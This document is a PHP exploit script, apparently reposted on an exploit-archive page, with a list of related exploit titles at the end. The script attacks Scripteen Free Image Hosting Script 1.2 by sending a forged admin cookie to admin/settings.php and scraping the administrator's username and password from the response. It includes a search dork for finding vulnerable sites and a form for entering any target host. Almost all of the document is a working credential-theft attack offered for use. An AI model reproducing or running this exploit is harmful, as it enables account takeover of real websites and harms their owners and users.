<?php

/*

Coded By RMx - Liz0zim

BiyoSecurity.Com & Coderx.org

Ki zava Ki Zava :)

Thanx : Crackers_Child - TR_IP - Volqan - All SQL Low3rz

*/

error_reporting("E_ALL");

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

$desen='|value="(.*)"|siU';

function yolla($host,$paket)

{

global $veri;

$ac=fsockopen(gethostbyname($host),80);

if (!$ac) {

echo 'Unable to connect to server '.$host.':80'; exit;//Bağlanamaz ise

}

fputs($ac,$paket);

$veri="";

while (!feof($ac)) {

$veri.=fread($ac,1);

}

fclose($ac);

}

?>

<h2>Scripteen Free Image Hosting Script V1.2.* (cookie) Admin Password Grabber Exploit</h2>

<p>Coded By RMx - Liz0ziM</p>

<p>Web:<a href="http://www.biyosecurity.com" target="_blank">www.biyosecurity.com</a> </p>

<p>Dork:"Powered by Scripteen Free Image Hosting Script V1.2"</p>

<form method="POST" action="">

<p>TARGET HOST:

<input name="host" type="text" />

Example:<strong>www.xxxx.com</strong></p>

<p>TARGET PATH: <input name="klasor" type="text" />

Example:<strong>/</strong> or <strong>/scriptpath/</strong> </p>

<p><input name="yolla" type="submit" value="Send" /></p>

</form><br />

<? if($_POST[yolla]){

$host=$_POST[host];

$klasor=$_POST[klasor];

$admin=$_POST[admin];

$p=$klasor."admin/settings.php";

echo '<font color="red"><b>Sending Exploit..</b></font><br>';

$packet ="GET ".$p." HTTP/1.0rn";

$packet.="Host: ".$host."rn";

$packet.="Cookie: cookid=1rn";

$packet.="Connection: Closernrn";

yolla($host,$packet);

preg_match_all($desen,$veri,$cik);

$ad=$cik[1][0];

$sifre=$cik[1][1];

if($ad AND $sifre){

echo '

<font color="green">Exploit succeeded...</font ><br>

Admin Username:<b>'.$ad.'</b><br>

Admin Password:<b>'.$sifre.'</b><br>';

}

else

{

echo '<font color="red">Exploit Failed !</font>';

}

}

?>

【Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit】相关文章：

★ Maian Cart 1.1 Insecure Cookie Handling Vulnerability

★ LoveCMS 1.6.2 Final Update Settings Remote Exploit

★ Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit

★ pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

★ Maian Music 1.0 Insecure Cookie Handling Vulnerability

★ TGS CMS 0.3.2r2 Remote Code Execution Exploit

★ MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

★ Wordpress Plugin Download Manager 0.2 Arbitrary File Upload Exploit

★ Maian Events 2.0 Insecure Cookie Handling Vulnerability

★ WarFTP 1.65 (USER) Remote Buffer Overlow Exploit